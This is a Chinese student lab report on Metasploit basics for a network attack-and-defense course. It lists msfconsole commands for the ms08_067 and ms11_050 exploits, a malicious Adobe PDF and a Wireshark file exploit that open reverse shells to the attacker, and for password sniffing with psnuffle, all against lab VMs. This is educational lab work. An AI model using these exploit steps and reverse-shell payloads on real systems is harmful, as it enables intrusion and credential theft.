zoukankan      html  css  js  c++  java
  • 2018-2019-2 20165315《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165315《网络攻防技术》Exp5 MSF基础应用

    目录

    一、实验内容
    二、实验步骤
    1、一个主动攻击实践

    2、一个针对浏览器的攻击,如ms11_050;

    3、一个针对客户端的攻击,如Adobe;

    4、成功应用任何一个辅助模块

    一、实验内容

    本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    • 一个主动攻击实践,如ms08_067;

    • 一个针对浏览器的攻击,如ms11_050;

    • 一个针对客户端的攻击,如Adobe;

    • 成功应用任何一个辅助模块。

    返回目录

    二、实验步骤

    1、一个主动攻击实践

    实现ms08_067

    靶机为Win2000

    • 在攻击机kali输入msfconsole进入控制台
    • 输入如下指令:
    msf > use exploit/windows/smb/ms08_067_netapi //选择漏洞
    
    msf exploit(ms08_067_netapi) > show payloads
    
    msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //选择载荷
    
    msf exploit(ms08_067_netapi) > set LHOST 10.0.0.110 //攻击机IP
    
    msf exploit(ms08_067_netapi) > set LPORT 5315
    
    msf exploit(ms08_067_netapi) > set RHOST 10.0.0.111 //靶机IP
    
    msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
    
    msf exploit(ms08_067_netapi) > exploit
    

    • 使用win2008作为靶机,结果渗透失败了...看来该靶机打过补丁,换一个试试

    • 换了个win2000的虚拟机(10.1.1.123)作为靶机,成功渗透~输入ipconfig等指令可以获得靶机的信息

    返回目录

    2、一个针对浏览器的攻击

    ms11_050

    靶机为Win7,浏览器为IE8

    • 在msf控制台中输入search ms11_050,搜索漏洞的相关信息

    • 输入use exploit/windows/browser/ms11_050_mshtml_cobjectelement,使用该漏洞
    • 依次输入如下指令
    # set payload windows/meterpreter/reverse_tcp //选择载荷
    # set LHOST 10.1.1.109  //设置攻击机IP
    # set LPORT 5315
    # set RHOST 10.1.1.243  //设置靶机IP
    # exploit
    
    • 将生成的网址输入Win7的IE8中,kali自动回连,渗透成功~

    返回目录

    3、一个针对客户端的攻击

    (1)Adobe PDF阅读器

    靶机为Win7

    • 输入search adobe,查找漏洞
    • 输入use windows/fileformat/adobe_cooltype_sing,使用漏洞
    • 输入以下指令:
    # set payload windows/meterpreter/reverse_tcp   //选择载荷
    # set LHOST 10.1.1.109 //攻击机IP
    # set FILENAME 20165315.pdf  //设置生成pdf文件的文件名
    # exploit
    

    • 生成文件后,输入如下指令:
    # use exploit/multi/handler //进入监听模块
    # set payload windows/meterpreter/reverse_tcp
    # set LHOST 10.1.1.109 //攻击机IP
    # set LPORT 5315
    # exploit
    

    • 将生成的pdf放进靶机中,使用Adobe打开,但是我这边还安装的是11.0版本的Adobe,而且用管理员身份也卸载不掉,要求用system权限卸载...由于虚拟机也比较卡,我就选择先试试别的客户端行不行

    返回目录

    (2)WireShark捕包器

    靶机为WinXP(也尝试了Win7)

    • 执行如下指令:
    # cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat  //进入漏洞程序所在目录
    # msfconsole
    # use exploit/windows/fileformat/wireshark_packet_dect.rb  //使用漏洞
    # set payload windows/meterpreter/reverse_tcp //选择载荷
    # set LHOST 10.1.1.109 //攻击者地址
    # exploit
    
    • 在WinXP中成功实现了回连,但是Win7没有反应,应该是打了补丁

    返回目录

    4、成功应用任何一个辅助模块

    靶机为Win7,被嗅探的上网浏览器为IE8

    • 输入cd /usr/share/metasploit-framework/modules/auxiliary进入到目录中查看有什么辅助模块

    • 我选择了sniffer嗅探器进行实验,进入目录后发现只有psnuffle.rb,这是metasploit中的口令嗅探工具,只有在接入对方网络的初始访问点后才能进行嗅探

    • 在msf控制台中输入use auxiliary/sniffer/psnuffle,使用该漏洞
    • 设置了靶机IP地址后,输入run开始运行,可以看见捕获了上网的记录,渗透成功~

    返回目录

    三、实验中遇到的问题

    • 在任务三中,我使用Adobe PDF打开含后门程序的PDF时,无法实现回连,换了好几个靶机都是这样

    解决过程:
    这个实验采用的漏洞是exploit/windows/browser/adobe_cooltype_sing,这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出,而我使用的Adobe版本是11.0,修复了该漏洞,所以无法实现渗透攻击。换一个9.0版本的应该就可以了,然鹅我还没卸载成功之前的版本,有时间再做吧,不拘泥于这一个客户端程序。

    返回目录

    四、实验总结

    1、基础问题回答

    • 用自己的话解释什么是exploit,payload,encode

    exploit就是用于渗透攻击的工具,可以运送payload载体;

    payload是载荷,在实验中就是一段shellcode代码,可以将恶意代码植入正常程序,具体执行攻击代码的模块;

    encode是用于给恶意代码编码,进行伪装,实现面杀的工具。

    2、离实战还缺些什么技术或步骤?

    • meterpreter里面很多漏洞都已经是比较早之前的了,大多数有攻击价值的靶机都已经给有关漏洞打上补丁了,现实中不可能轻易利用这些漏洞攻击,所以需要获取最新漏洞情报。
    • meterpreter虽然提供了很多payload,但是功能都已经固定,要是能自己编写实现特定功能的payload,这样的攻击会更有针对性。
    • 大多数攻击都要关闭防火墙,但是实战中一般不会关掉防火墙,如何绕开防火墙也是重点

    3、实验感想

    通过这次实验,深切的体会到了补丁的重要性,自己电脑上一定要打好补丁。而且不要轻易打开来源不明的文档文件等等,可能是携带后门程序的恶意文件。还有就是要定期更新软件,各个软件的更新可能会包含补丁的升级,让电脑更加安全。

    返回目录

  • 相关阅读:
    Unix命令大全
    vs2008 与 IE8出现的兼容性问题
    Java 创建文件、文件夹以及临时文件
    如何修改Wamp中mysql默认空密码
    PAT 乙级真题 1003.数素数
    Tags support in htmlText flash as3
    DelphiXE4 FireMonkey 试玩记录,开发IOS应用 还是移植
    10 Great iphone App Review sites to Promote your Apps!
    HTML tags in textfield
    Delphi XE4 IOS 开发, "No eligible applications were found“
  • 原文地址:https://www.cnblogs.com/yh666/p/10720015.html
Copyright © 2011-2022 走看看